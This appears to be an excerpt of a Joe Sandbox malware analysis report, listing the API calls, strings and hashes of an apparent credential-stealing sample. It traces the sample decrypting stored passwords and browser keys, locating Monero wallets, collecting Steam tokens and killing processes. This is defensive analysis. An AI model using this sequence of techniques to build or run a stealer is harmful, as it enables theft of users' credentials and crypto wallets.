                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 071b8a119199d234cc1335d80a7b8f2228c7acaa9d384c1b86fc1e1d399a2f42
                                    • Instruction ID: 0b71ab782d48474497db0a028876b11ce3c9a58295bf024f3a8fa8f3ddcd144c
                                    • Opcode Fuzzy Hash: 071b8a119199d234cc1335d80a7b8f2228c7acaa9d384c1b86fc1e1d399a2f42
                                    • Instruction Fuzzy Hash: 9651F0719006029BDB64DF38D858A6AB7B8FF44790F008125ED1ADB244EB34ED51DBE1
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F67805
                                    • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00F6784A
                                    • StrStrA.SHLWAPI(?,Password), ref: 00F678B8
                                      • Part of subcall function 00F67750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 00F6775E
                                      • Part of subcall function 00F67750: RtlAllocateHeap.NTDLL(00000000), ref: 00F67765
                                      • Part of subcall function 00F67750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00F6778D
                                      • Part of subcall function 00F67750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00F677AD
                                      • Part of subcall function 00F67750: LocalFree.KERNEL32(?), ref: 00F677B7
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F678EC
                                    • HeapFree.KERNEL32(00000000), ref: 00F678F3
                                    • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00F67A35
                                    • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                    • String ID: Password
                                    • API String ID: 356768136-3434357891
                                    • Opcode ID: 4cc0db290af69da511b95f26eb033af0a4ec71484b07dc73371370ea26a1a10c
                                    • Instruction ID: e92c7b556a229b0887dfda2dae439ef404f7c884c7701efe90bcae360f6c1c3a
                                    • Opcode Fuzzy Hash: 4cc0db290af69da511b95f26eb033af0a4ec71484b07dc73371370ea26a1a10c
                                    • Instruction Fuzzy Hash: 287150B1D0021DABDB10DF95CC80ADEB7F8FF49314F14416AE519A7200EB35AA85DFA1
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00F74F39), ref: 00F84545
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F8454C
                                    • wsprintfW.USER32 ref: 00F8455B
                                    • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 00F845CA
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00F845D9
                                    • CloseHandle.KERNEL32(00000000,?,?), ref: 00F845E0
                                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                    • String ID: %hs
                                    • API String ID: 885711575-2783943728
                                    • Opcode ID: 28d44665d1acd29a59a47db2d90b764333fdbc04484791f78dcd0caf1d8f4f87
                                    • Instruction ID: 05cb1e334401c8ce1b8c01fe5740f92f25e0fa659a821247e8e93f4fdd03b65c
                                    • Opcode Fuzzy Hash: 28d44665d1acd29a59a47db2d90b764333fdbc04484791f78dcd0caf1d8f4f87
                                    • Instruction Fuzzy Hash: 95315072A00209ABEB24EBE4DC45FDE777CBF45700F144069F625E7184DB74AA818BA6
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F61135
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F6113C
                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00F61159
                                    • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00F61173
                                    • RegCloseKey.ADVAPI32(?), ref: 00F6117D
                                    Strings
                                    • SOFTWARE\monero-project\monero-core, xrefs: 00F6114F
                                    • wallet_path, xrefs: 00F6116D
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                    • API String ID: 3225020163-4244082812
                                    • Opcode ID: 9a2232cd1e1b4f9d1a1d18ffa7148c836af5b4fc0dc30073df57b6ecda30367e
                                    • Instruction ID: 47b706f6cd3b286e867e451dcc07ce6a1398caa0beb4975a9c62fc52d392e2e5
                                    • Opcode Fuzzy Hash: 9a2232cd1e1b4f9d1a1d18ffa7148c836af5b4fc0dc30073df57b6ecda30367e
                                    • Instruction Fuzzy Hash: F8F09675A4030DBBE7149BE19C4EFEA7B7CEB04715F000064FF25E2284D670598497A2
                                    APIs
                                    • memcmp.MSVCRT(?,v20,00000003), ref: 00F69E04
                                    • memcmp.MSVCRT(?,v10,00000003), ref: 00F69E42
                                    • LocalAlloc.KERNEL32(00000040), ref: 00F69EA7
                                      • Part of subcall function 00F871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00F871FE
                                    • lstrcpy.KERNEL32(00000000,00F94C48), ref: 00F69FB2
                                    • API ID: lstrcpymemcmp$AllocLocal
                                    • String ID: @$v10$v20
                                    • API String ID: 102826412-278772428
                                    • Opcode ID: 92846d87eea2b0606e9faeb070bcec444182d0659f655c239c049e93aaa2056a
                                    • Instruction ID: 5838353808ca09cf9d60d6af677d92514fd2c262bb7aebd20e3ca16a7e527a8b
                                    • Opcode Fuzzy Hash: 92846d87eea2b0606e9faeb070bcec444182d0659f655c239c049e93aaa2056a
                                    • Instruction Fuzzy Hash: A651A231A152099BDB20EFA4DC85BDE77A8EF50324F194024F919EB241DBB8ED45ABD0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F6565A
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F65661
                                    • InternetOpenA.WININET(00F8CFEC,00000000,00000000,00000000,00000000), ref: 00F65677
                                    • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00F65692
                                    • InternetReadFile.WININET(?,?,00000400,00000001), ref: 00F656BC
                                    • memcpy.MSVCRT(00000000,?,00000001), ref: 00F656E1
                                    • InternetCloseHandle.WININET(?), ref: 00F656FA
                                    • InternetCloseHandle.WININET(00000000), ref: 00F65701
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                    • String ID:
                                    • API String ID: 1008454911-0
                                    • Opcode ID: 29cb1984c9bd9c9b1e27446d47f1b65082fcd5b385a00225f0099a9468fb050f
                                    • Instruction ID: 77c9a7ec078f0e46fb5f842dcb49182fbc81f6258561a07296556f96115d2df5
                                    • Opcode Fuzzy Hash: 29cb1984c9bd9c9b1e27446d47f1b65082fcd5b385a00225f0099a9468fb050f
                                    • Instruction Fuzzy Hash: 4741A370E00208DFDB24CF55D844F9AB7B4FF48714F14806DEA28AB295E3719981CF95
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00F84759
                                    • Process32First.KERNEL32(00000000,00000128), ref: 00F84769
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00F8477B
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F8479C
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F847AB
                                    • CloseHandle.KERNEL32(00000000), ref: 00F847B2
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00F847C0
                                    • CloseHandle.KERNEL32(00000000), ref: 00F847CB
                                    • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 3836391474-0
                                    • Opcode ID: 41da5dfef691c4241b858fe5791038ef58eaca2c7c27d4a31a71a3e41f6efc20
                                    • Instruction ID: e23e26b61fb5230eae21fce31e0ffd10f16a0c872d071ad130bf46571b6ff5a0
                                    • Opcode Fuzzy Hash: 41da5dfef691c4241b858fe5791038ef58eaca2c7c27d4a31a71a3e41f6efc20
                                    • Instruction Fuzzy Hash: 69019271A01219ABE7346A709C8DFEE77BCEB09B65F0401A4FA25D1084EB749DC08B61
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 00F78435
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7846C
                                    • lstrlen.KERNEL32(00000000), ref: 00F784B2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F784E9
                                    • lstrlen.KERNEL32(00000000), ref: 00F784FF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7852E
                                    • StrCmpCA.SHLWAPI(00000000,00F94C3C), ref: 00F7853E
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: bf1e5ecd82c37643c31345b74d7352b6dc1abc778f7ab171711ece6a68f2d7ff
                                    • Instruction ID: 05f9a8b28082696fcae368c509546759ba726176fd37659ced0393f204afbe2d
                                    • Opcode Fuzzy Hash: bf1e5ecd82c37643c31345b74d7352b6dc1abc778f7ab171711ece6a68f2d7ff
                                    • Instruction Fuzzy Hash: C051C471A402058FCB24DF64D888A5BB7F9EF48760F18C42EEC59DB205EB34E942DB51
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00F82925
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F8292C
                                    • RegOpenKeyExA.ADVAPI32(80000002,00A8C128,00000000,00020119,00F828A9), ref: 00F8294B
                                    • RegQueryValueExA.ADVAPI32(00F828A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00F82965
                                    • RegCloseKey.ADVAPI32(00F828A9), ref: 00F8296F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: eeca2870e0071e07caa7d6b93a545ebf31f8f13bbc442d4144559816c44bc3b5
                                    • Instruction ID: 3a262298381d2a284ed30de948e16c48480a5921bede311352136ae27eb9a6cd
                                    • Opcode Fuzzy Hash: eeca2870e0071e07caa7d6b93a545ebf31f8f13bbc442d4144559816c44bc3b5
                                    • Instruction Fuzzy Hash: 87012F75A00318ABE324DBA0DC59EFB7BBCEB09715F1400A8FE65DB244E631694487A0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00F82895
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F8289C
                                      • Part of subcall function 00F82910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00F82925
                                      • Part of subcall function 00F82910: RtlAllocateHeap.NTDLL(00000000), ref: 00F8292C
                                      • Part of subcall function 00F82910: RegOpenKeyExA.ADVAPI32(80000002,00A8C128,00000000,00020119,00F828A9), ref: 00F8294B
                                      • Part of subcall function 00F82910: RegQueryValueExA.ADVAPI32(00F828A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00F82965
                                      • Part of subcall function 00F82910: RegCloseKey.ADVAPI32(00F828A9), ref: 00F8296F
                                    • RegOpenKeyExA.ADVAPI32(80000002,00A8C128,00000000,00020119,00F79500), ref: 00F828D1
                                    • RegQueryValueExA.ADVAPI32(00F79500,00A9E1D8,00000000,00000000,00000000,000000FF), ref: 00F828EC
                                    • RegCloseKey.ADVAPI32(00F79500), ref: 00F828F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: 4d2c05ebd71f584808c452a6569f0e5c02f733bee9c789bf04d22f32344bbdd4
                                    • Instruction ID: f8281c8185b6d9b83af6d01810587d45fbfb748ece7019f8d8417af195ba6f1a
                                    • Opcode Fuzzy Hash: 4d2c05ebd71f584808c452a6569f0e5c02f733bee9c789bf04d22f32344bbdd4
                                    • Instruction Fuzzy Hash: 7301A271A0020CBBEB28ABA4AC4AEEA776CEB44715F000169FE28D6244D6715A8497A1
                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 00F6723E
                                    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00F67279
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F67280
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00F672C3
                                    • HeapFree.KERNEL32(00000000), ref: 00F672CA
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00F67329
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                    • String ID:
                                    • API String ID: 174687898-0
                                    • Opcode ID: c0f02737c72a731384b75a0a975f4ffa72045892df74aac0e9407d2c760d8f0c
                                    • Instruction ID: 90348c7295444ccc9eb89a5386daae7bd2391c69111acd788ddf26b6be5dba58
                                    • Opcode Fuzzy Hash: c0f02737c72a731384b75a0a975f4ffa72045892df74aac0e9407d2c760d8f0c
                                    • Instruction Fuzzy Hash: 46417E71B047059BEB20DF69D885BAAB3E8FB88319F1445A9EC5DC7300E631E940AB50
                                    APIs
                                    • lstrcpy.KERNEL32(00000000), ref: 00F69CA8
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00F69CDA
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00F69D03
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocLocallstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2746078483-738592651
                                    • Opcode ID: 697f364d18750e0bc93161ac53f03c29906cc081b5dbab4e1c070c26030e032e
                                    • Instruction ID: 2b5accd3c0b6b08d43d35312538f2b1ccec2a6503a5e751a7114b799440a8a4a
                                    • Opcode Fuzzy Hash: 697f364d18750e0bc93161ac53f03c29906cc081b5dbab4e1c070c26030e032e
                                    • Instruction Fuzzy Hash: 8841BE31E052099BDF21EFA4DE41AAEB7B8EF94314F084078E955A7342DBB4ED01E780
                                    APIs
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00F7EA24
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7EA53
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7EA61
                                    • lstrcat.KERNEL32(?,00F91794), ref: 00F7EA7A
                                    • lstrcat.KERNEL32(?,00A992A8), ref: 00F7EA8D
                                    • lstrcat.KERNEL32(?,00F91794), ref: 00F7EA9F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FolderPathlstrcpy
                                    • String ID:
                                    • API String ID: 818526691-0
                                    • Opcode ID: 2252c904bdbc4cc7f1ebe1dcfebc2d761f92fabe18491a86bd827f0af6dba730
                                    • Instruction ID: a22e89d5af7e480add8dc1e6ec5f3160f5aa6e6ab42f23ab5d4c9d8a457adb6c
                                    • Opcode Fuzzy Hash: 2252c904bdbc4cc7f1ebe1dcfebc2d761f92fabe18491a86bd827f0af6dba730
                                    • Instruction Fuzzy Hash: BB41C97191011DABDB65EBA4DD42EED7378FF48300F0444A9B63AD7240DB789E84AB91
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7ECDF
                                    • lstrlen.KERNEL32(00000000), ref: 00F7ECF6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7ED1D
                                    • lstrlen.KERNEL32(00000000), ref: 00F7ED24
                                    • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 00F7ED52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: steam_tokens.txt
                                    • API String ID: 367037083-401951677
                                    • Opcode ID: 16bad9b8c5ec67387ec96c8c60aa6190e3c8b4ff531aff395255cbc6731f7e3c
                                    • Instruction ID: 5521ecb7bc7d5ac134f1af5bdf92001313ca7c535949727ef0bda271f8aed240
                                    • Opcode Fuzzy Hash: 16bad9b8c5ec67387ec96c8c60aa6190e3c8b4ff531aff395255cbc6731f7e3c
                                    • Instruction Fuzzy Hash: 6831E631A119055BC772BBB8ED4A95E77A8AF44310F084075F85ADB202EB7CDC05B7D2
                                    APIs
                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00F6140E), ref: 00F69A9A
                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00F6140E), ref: 00F69AB0
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,00F6140E), ref: 00F69AC7
                                    • ReadFile.KERNEL32(00000000,00000000,?,00F6140E,00000000,?,?,?,00F6140E), ref: 00F69AE0
                                    • LocalFree.KERNEL32(?,?,?,?,00F6140E), ref: 00F69B00
                                    • CloseHandle.KERNEL32(00000000,?,?,?,00F6140E), ref: 00F69B07
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: 5187e7db0bf877a2be70ee522774b192f0c851c3d47d8a14a98b6ae456221aac
                                    • Instruction ID: f566e01dd3efbdf23e35904cf9841e09de21faffc90d1c847252cfbcf1bee029
                                    • Opcode Fuzzy Hash: 5187e7db0bf877a2be70ee522774b192f0c851c3d47d8a14a98b6ae456221aac
                                    • Instruction Fuzzy Hash: 7F116371A04209AFD720DFA9DCC8EBE736CEB45754F100169F92197180D7B4DD90DBA1
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F85B14
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A188
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A1AE
                                    • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00F85B7C
                                    • memmove.MSVCRT(00000000,?,?), ref: 00F85B89
                                    • memmove.MSVCRT(00000000,?,?), ref: 00F85B98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: vector<T> too long
                                    • API String ID: 2052693487-3788999226
                                    • Opcode ID: f092cf6992e39eabf63004996dfa67804f5882333d23a311ecd6ea71f15598da
                                    • Instruction ID: 45ba7ea71cf92c8785d36a5c3667ba0b9e72eea65e5fabea566d0b46c52f5085
                                    • Opcode Fuzzy Hash: f092cf6992e39eabf63004996dfa67804f5882333d23a311ecd6ea71f15598da
                                    • Instruction Fuzzy Hash: 26417F72B005199FCF08DF6CCD95AAEBBB5EB99710F148229E909E7384E634DD018B90
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F77D58
                                      • Part of subcall function 00F8A1C0: std::exception::exception.LIBCMT ref: 00F8A1D5
                                      • Part of subcall function 00F8A1C0: std::exception::exception.LIBCMT ref: 00F8A1FB
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F77D76
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F77D91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                    • String ID: invalid string position$string too long
                                    • API String ID: 3310641104-4289949731
                                    • Opcode ID: 250f102558e52bb121b4d50d5d1c241065c60c3dde6dd6b69dc0b2a823519b0b
                                    • Instruction ID: 830f8cb2f495378d5203ceb21467c65b8c4a491576b8c52dc72ef9a5e6474da2
                                    • Opcode Fuzzy Hash: 250f102558e52bb121b4d50d5d1c241065c60c3dde6dd6b69dc0b2a823519b0b
                                    • Instruction Fuzzy Hash: BF21A5323147004BD730AE6CD881A3AB7E5EFA5760B208A6FE4598B241D771DC4197A6
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F833EF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F833F6
                                    • GlobalMemoryStatusEx.KERNEL32 ref: 00F83411
                                    • wsprintfA.USER32 ref: 00F83437
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB
                                    • API String ID: 2922868504-2651807785
                                    • Opcode ID: 260b243c7d6516bcac58ef837c8fe2a2bc1c49f2179e8b01a7cee725169a220f
                                    • Instruction ID: d09a83a79f7a378813bfeccdfd9944e23cfd1d064dfbfa02e51b8ba444afd133
                                    • Opcode Fuzzy Hash: 260b243c7d6516bcac58ef837c8fe2a2bc1c49f2179e8b01a7cee725169a220f
                                    • Instruction Fuzzy Hash: 2001B971A04218ABDB14DF98DC45BADB77CFB45B10F000129F926E7380D77559008792
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00A9DCD0,00000000,00020119,?), ref: 00F7D7F5
                                    • RegQueryValueExA.ADVAPI32(?,00A9E508,00000000,00000000,00000000,000000FF), ref: 00F7D819
                                    • RegCloseKey.ADVAPI32(?), ref: 00F7D823
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7D848
                                    • lstrcat.KERNEL32(?,00A9E388), ref: 00F7D85C
